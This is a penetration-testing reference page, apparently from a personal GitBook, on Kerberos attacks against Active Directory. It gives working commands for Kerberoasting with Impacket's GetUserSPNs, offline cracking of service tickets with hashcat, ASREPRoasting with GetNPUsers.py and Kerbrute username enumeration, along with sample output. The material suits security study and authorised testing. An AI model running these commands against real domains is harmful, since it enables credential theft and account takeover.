CyberWolf-Security
  • Home
  • Getting Started in Cyber Security
  • Misc
    • Misc Items
      • Powershell commands
      • Reverse Shells
      • Web Shells
      • File Sharing
      • Useful Commands
      • Google Dorks
      • Proxy & Proxy Chains
      • Port Scanning
      • Intercept Linux CLI Traffic
      • Nessus
    • Frequency stuff
    • Random stuff - needs sorting
  • Services
    • Ports - Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 69 - TFTP
      • 79 - Finger
      • 88 - Kerberos
      • 123 - NTP
      • 137 - Netbios
      • 161 - SNMP
      • 363 - LDAP
      • 443 - HTTPS
        • IIS
      • 445 - SMB
      • 500 - IKE
      • 623 - IPMI
      • 873 - RSYNC
      • 1433 - MSSQL
      • 1521 - Oracle DB
      • 3389 - RDP
      • 3260 - iSCSI
      • 2049 - NFS
      • 5900 - VNC
      • 5985 - WinRM
      • 6000 - X11
      • 8080 - Jenkins
      • 11211 - Memcached
  • Password Cracking
    • Password attacks
    • Password Cracking
  • Tools
    • Tools
      • Crackmapexec
      • Metasploit
      • Bloodhound
      • Tcpdump
      • Logcat
  • Wireless testing
    • Wireless
      • Converting handshake to .hccapx for Hashcat
      • Cracking WPA/WPA2 hashes
      • Hacking Wireless
      • Get Wireless password from Windows CMD
      • Hotspot
  • Web Application
    • Web App
      • Directory Brute forcing
      • Subdomain brute forcing
      • JWT Tokens
      • GIT
      • Cross-Site Scripting (XSS)
        • Embedded images
        • Payloads
      • WPScan
      • Local File Inclusion (LFI)
      • SQLmap
      • Server Side Template Injection
      • SQL Injection
      • Using Hydra for web brute force
      • Remote Code Execution (RCE)
      • Uploads
      • Subdomain takeover
      • XLS/CSV Injection
      • XML Injection
  • Internals
    • Internals
      • Finding Domain Controllers and DHCP servers
      • Discovering hosts from the inside
      • Dumping domain hashes
      • Active Directory
      • Getting local hashes
      • service principle names (SPNs)
  • Mobile Application
    • Mob App
      • MobApp Testing VM
      • Jailbreaking IOS
      • Tools
        • Frida
        • MobSF
          • Installing MobSF
      • Mobile Application Testing
        • Android
          • Checklist and Methodology
          • ADB
        • IOS
          • Checklist and Methodology
  • Cloud
    • Microsoft Office 365 Security Review
      • Page 1
    • Kubernetes & Docker Review
  • Privilege escalation
    • Windows
      • Tools
      • Unquoted service paths
    • Service Execution
    • Linux
      • Tools
      • Perform a core dump
      • Useful commands
      • Spawn a TTY shell
  • CTF-stuff
    • .Git
  • Steganography
    • Tools
  • Labs / Resources
    • Mitre Caldera
    • Blue-Team
      • Labs
    • Red-Team
      • Vulnerable virtual machines
      • Vulnerable Sites
  • Training
    • Certifications
      • OSCP
      • CEH
      • Crest
        • Crest CPSA
        • Crest CRT
          • Syllabus
          • Appendix B: Core Technical Skills
            • B4 - Network Mapping & Target Identification
            • B5 - Interpreting Tool Output
            • B8 - OS Fingerprinting
            • B9 - Application Fingerprinting and Evaluating Unknown Services
            • B13 - File System Permissions
          • Appendix C: Background Information Gathering & Open Source
            • C2 - Domain Name Server (DNS)
          • Appendix D: Networking Equipment
            • D1 - Management Protocols
            • D3 - Networking Protocols
          • Appendix E: Microsoft Windows Security Assessment
            • E1 - Domain Reconnaissance
            • E2 - User Enumeration
            • E3 - Active Directory
            • E5 - Windows Vulnerabilities
            • E9 - Common Windows Applications
          • Appendix F: Unix Security Assessment
            • F1- User enumeration
            • F2 - Unix vulnerabilities
            • F3 - FTP
            • F4 - Sendmail / SMTP
            • F5 - Network File System (NFS)
            • F6 - R* services
            • F7 - X11
            • F8 - RPC services
            • F9 - SSH
          • Appendix G: Web Technologies
            • G1 - Web Server Operation
            • G2 - Web Servers & their Flaws
            • G4 - Web Protocols
            • G7 - Web Application Servers
          • Appendix I: Web Testing Techniques
            • I1 - Web Site Structure Discovery
            • I2 - Cross Site Scripting Attacks
            • I3 - SQL Injection
            • I6 - Parameter Manipulation
          • Appendix J: Databases
            • J1 - Microsoft SQL Server
            • J2 - Oracle RDBMS
            • J3 - Web / App / Database Connectivity
      • Study Material
        • Encryption
    • Terminology
      • NTLM & NTLM2
  • Vulnerabilities
    • Vulnerabilities
  • Exploits
    • ImageMagick
    • CVE-2021-3560 (PolKit)
  • Bug Bounty
    • Bug Bounty Programs
    • Sub Domain Finder
    • link dump
  • FAQ
    • Install ALFA AWUS1900 on Kali
    • Update and upgrade Linux
  • Build Review
    • Workstation
  • Hack the Box
    • Challenges
      • The Needle
Powered by GitBook
On this page
  • Kerberoasting
  • ASREPRoasting
  • Install on Kali
  • Kerbrute

Was this helpful?

  1. Internals
  2. Internals

service principle names (SPNs)

Service Principal Names (SPNs) are a unique identifier tied to each instance of a Windows service that can delegate to authenticate using Kerberos

They allow a service running on a server to authenticate to client computers on a network. These are used primarily in Active Directory (AD) environments.

An SPN is tied to the logon account of the service, meaning it's possible for a user account to have multiple SPNs if it's running multiple services. If a service or user account has an SPN, then it's possible for that service or account to request a Kerberos ticket. This is where the potential for abuse can occur, and it's the basis for what's known as a Kerberoasting attack.

Kerberoasting

Kerberoasting is a method where an attacker, even one without a high privilege level, can request Kerberos tickets for any user that has an SPN associated with their account. Since these tickets are encrypted with the user's password, they can then be taken offline and subjected to a brute force attack.

Testing for SPNs

To test for SPNs, you can use Impacket's GetUserSPNs tool. The tool allows you to request and export SPNs associated with a user account for offline cracking. 

impacket-GetUserSPNs -dc-ip 10.199.101.5 <domain>.local/<user>
impacket-GetUserSPNs -request -dc-ip 192.168.95.11 <domain>.local/<user>

Replace <domain>.local with the Fully Qualified Domain Name (FQDN) of your target, and <user> with the username you're interested in. The -dc-ip parameter specifies the IP address of the domain controller you're targeting.

Once you've gathered the SPNs, you can then attempt to crack the passwords offline using a tool like Hashcat. Here's an example of how to use Hashcat for this:

hashcat -m 13100 hashes.txt /mnt/hgfs/Host_Desktop/ -o cracked.txt

In this example, -m 13100 specifies the mode (in this case, Kerberos 5 TGS-REP etype 23), hashes.txt is the file containing the SPN hashes you've exported, and -o cracked.txt is the output file for any cracked passwords.

ASREPRoasting

If you do not have valid domain credentials, you can look to check if any of the users you do currently have, if the account has "Does not require pre-authentication" enabled, allowing for ASREPRoasting. You can use GetNPUsers.py from Impacket

python3 GetNPUsers.py <domain>/<username> -dc-ip <domain-controller-ip> -request

If the target user has "Does not require Kerberos pre-authentication" enabled, you will receive an AS-REP hash that can be cracked offline.

Install on Kali

GetNPUsers.py is not included in Kali Linux by default. However, it is part of the Impacket suite, which you can install on Kali. Here’s how to set it up:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 -m pip install .
python3 examples/GetNPUsers.py <domain>/<username> -dc-ip <domain-controller-ip> -request

Responses might look like this

[-] User delta doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gama doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User reception doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User scans doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User temp doesn't have UF_DONT_REQUIRE_PREAUTH set

Kerbrute

Iff you do not have valid domain credentials to try the above, you can bruteforce attempts to request a Ticket GRanting Ticket (TGT) from the domain controller for each username in a provided list.

When a valid username is found, the domain controller responds differently compared to when the username does not exist. This response can confirm the validity of a username.

./kerbrute userenum --dc <domain-controller-ip> -d <domain> <userlist.txt>

It is not installed in kali though so you can get it by doing the following:

sudo apt update
sudo apt install golang-go
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build

Valid users will look like this:


    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 10/09/24 - Ronnie Flathers @ropnop

2024/10/09 09:13:28 >  Using KDC(s):
2024/10/09 09:13:28 >   10.24.1.20:88

2024/10/09 09:13:30 >  [+] VALID USERNAME:       gemma@acmecorp
2024/10/09 09:13:33 >  Done! Tested 10279 usernames (1 valid) in 5.110 seconds

In this instance, a single user was found called "gemma"

PreviousGetting local hashesNextMob App

Last updated 6 months ago

Was this helpful?